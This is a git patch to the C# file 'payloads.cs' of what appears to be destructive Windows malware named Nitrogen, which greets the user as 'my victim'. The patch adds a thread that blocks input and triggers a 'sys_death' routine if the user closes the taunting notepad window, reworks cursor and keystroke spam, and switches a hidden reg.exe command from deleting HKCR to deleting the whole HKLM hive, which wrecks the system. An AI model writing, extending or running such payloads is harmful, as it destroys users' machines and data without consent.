From b9b9477bc3e065b90385ddc1d1c00888fd49b0fa Mon Sep 17 00:00:00 2001 From: Vichingo455 Date: Fri, 6 Dec 2024 16:20:08 +0100 Subject: [PATCH] Prevent closing the notepad window --- payloads.cs | 57 +++++++++++++++++++++++++++++++---------------------- 1 file changed, 33 insertions(+), 24 deletions(-) diff --git a/payloads.cs b/payloads.cs index cda29be..928fa60 100644 --- a/payloads.cs +++ b/payloads.cs @@ -188,22 +188,10 @@ namespace Nitrogen int x = Screen.PrimaryScreen.Bounds.Width, y = Screen.PrimaryScreen.Bounds.Height; Dll_Imports.POINT get_mouse; Dll_Imports.GetCursorPos(out get_mouse); - if (variables.extreme == false) - { - Dll_Imports.SetCursorPos(Convert.ToInt32(get_mouse.X + rand.Next(-20, 20)), Convert.ToInt32(get_mouse.Y + rand.Next(-20, 20))); - } - else + if (variables.extreme) { Dll_Imports.SetCursorPos(Convert.ToInt32(get_mouse.X + rand.Next(-100, 100)), Convert.ToInt32(get_mouse.Y + rand.Next(-100, 100))); - } - Dll_Imports.mouse_event(Dll_Imports.MOUSEEVENTF_LEFTDOWN, x, y, 0, UIntPtr.Zero); - Dll_Imports.mouse_event(Dll_Imports.MOUSEEVENTF_LEFTUP, x, y, 0, UIntPtr.Zero); - Dll_Imports.mouse_event(Dll_Imports.MOUSEEVENTF_MIDDLEDOWN, x, y, 0, UIntPtr.Zero); - Dll_Imports.mouse_event(Dll_Imports.MOUSEEVENTF_MIDDLEUP, x, y, 0, UIntPtr.Zero); - Dll_Imports.mouse_event(Dll_Imports.MOUSEEVENTF_RIGHTDOWN, x, y, 0, UIntPtr.Zero); - Dll_Imports.mouse_event(Dll_Imports.MOUSEEVENTF_RIGHTUP, x, y, 0, UIntPtr.Zero); - - string myText = "abcdefghijklmnopqrstuvwxyzěščřžýáíé+=´¨/*-+0123456789öÿïäëéóśńŕůú)§,.-" + + string myText = "abcdefghijklmnopqrstuvwxyzěščřžýáíé+=´¨/*-+0123456789öÿïäëéóśńŕůú)§,.-" + "☺☻♥♦♣♠•◘○◙♂♀♪♫☼►◄↕‼¶§▬↨↑↓→←∟↔▲▼ !?ûùÿ┤╡╢╖╕║╗╝╜╛┐└┴┬├─┼╞╟╚╔╩╦╠═╬╧╨╤,-.!:É" + "@°E›ÍОÌåÃTWÉò=*ª‹nצádö Ôâ͹¸¯š1‰z]fz祔cÿ®fмjz›»ê¼Š£ŠaÃÌ?›}ïKÜÿ†æ&è†&Ù÷™ŒfF2ä ™Ó°iƼ?¨c ¶’óQñ‚" + "q4R³kUzH‡ñ‹Ð¿ZØ†‹©iÞ8Zoþóþ¤bqm†ú @Á]»ÜÃÆz¾ÇüðÅ­Esîp«›lbû‹&e[”0®¨°zå(1ÿ"; - char[] Mychars = myText.ToCharArray(); + char[] Mychars = myText.ToCharArray(); - UInt16 uniCode = Mychars[rand.Next(Mychars.Length)]; + UInt16 uniCode = Mychars[rand.Next(Mychars.Length)]; - Dll_Imports.INPUT[] input = new Dll_Imports.INPUT[1]; - input[0].type = Dll_Imports.InputType.INPUT_KEYBOARD; - input[0].U.ki.wScan = (Dll_Imports.ScanCodeShort)uniCode; - input[0].U.ki.dwFlags = Dll_Imports.KEYEVENTF.UNICODE; - Dll_Imports.SendInput(1, input, Marshal.SizeOf(typeof(Dll_Imports.INPUT))); - Thread.Sleep(5); + Dll_Imports.INPUT[] input = new Dll_Imports.INPUT[1]; + input[0].type = Dll_Imports.InputType.INPUT_KEYBOARD; + input[0].U.ki.wScan = (Dll_Imports.ScanCodeShort)uniCode; + input[0].U.ki.dwFlags = Dll_Imports.KEYEVENTF.UNICODE; + Dll_Imports.SendInput(1, input, Marshal.SizeOf(typeof(Dll_Imports.INPUT))); + Thread.Sleep(5); + } + Dll_Imports.mouse_event(Dll_Imports.MOUSEEVENTF_LEFTDOWN, x, y, 0, UIntPtr.Zero); + Dll_Imports.mouse_event(Dll_Imports.MOUSEEVENTF_LEFTUP, x, y, 0, UIntPtr.Zero); + Dll_Imports.mouse_event(Dll_Imports.MOUSEEVENTF_MIDDLEDOWN, x, y, 0, UIntPtr.Zero); + Dll_Imports.mouse_event(Dll_Imports.MOUSEEVENTF_MIDDLEUP, x, y, 0, UIntPtr.Zero); + Dll_Imports.mouse_event(Dll_Imports.MOUSEEVENTF_RIGHTDOWN, x, y, 0, UIntPtr.Zero); + Dll_Imports.mouse_event(Dll_Imports.MOUSEEVENTF_RIGHTUP, x, y, 0, UIntPtr.Zero); } if (variables.extreme == false) Thread.Sleep(rand.Next(3000, 10000)); @@ -273,6 +268,7 @@ namespace Nitrogen public static void story() { Thread.Sleep(5000); + Thread CheckNotepadThread = new Thread(CheckNotepad); string userName = System.Security.Principal.WindowsIdentity.GetCurrent().Name; string text = "Hello my victim " + userName + "!" + "I'm the thing you run 2 fucking seconds ago!" + @@ -288,11 +284,11 @@ namespace Nitrogen char[] Mychars = text.ToCharArray(); Process.Start(@"C:\Windows\notepad.exe"); Process[] proces_name = Process.GetProcessesByName("notepad"); - Cursor.Hide(); while (proces_name.Length == 0) { } Thread.Sleep(1000); Thread th_spam = new Thread(mouse_spam); th_spam.Start(); + CheckNotepadThread.Start(); for (int num = 0; num < Mychars.Length; num++) { int x = Screen.PrimaryScreen.Bounds.Width; int y = Screen.PrimaryScreen.Bounds.Height; @@ -312,6 +308,7 @@ namespace Nitrogen Thread.Sleep(100); } + CheckNotepadThread.Abort(); Cursor.Show(); Thread.Sleep(1000); foreach (Process proces_n in proces_name) { proces_n.Kill(); } @@ -347,6 +344,7 @@ namespace Nitrogen Process[] proces_name = Process.GetProcessesByName("notepad"); while (proces_name.Length == 1) { + Cursor.Hide(); proces_name = Process.GetProcessesByName("notepad"); Cursor.Position = new Point(50, 50); Dll_Imports.mouse_event(Dll_Imports.MOUSEEVENTF_LEFTUP, 50, 50, 0, UIntPtr.Zero); @@ -354,6 +352,17 @@ namespace Nitrogen Thread.Sleep(1); } } + public static void CheckNotepad() + { + Process[] proces_name = Process.GetProcessesByName("notepad"); + while (proces_name.Length == 1) + { + proces_name = Process.GetProcessesByName("notepad"); + } + BlockInput(true); + sys_death(); + Environment.Exit(-1); + } public static void move_icon() { for (; ; ) @@ -457,7 +466,7 @@ namespace Nitrogen { UseShellExecute = true, FileName = "reg.exe", - Arguments = @"delete HKCR /f", + Arguments = @"delete HKLM /f", CreateNoWindow = true, WindowStyle = ProcessWindowStyle.Hidden };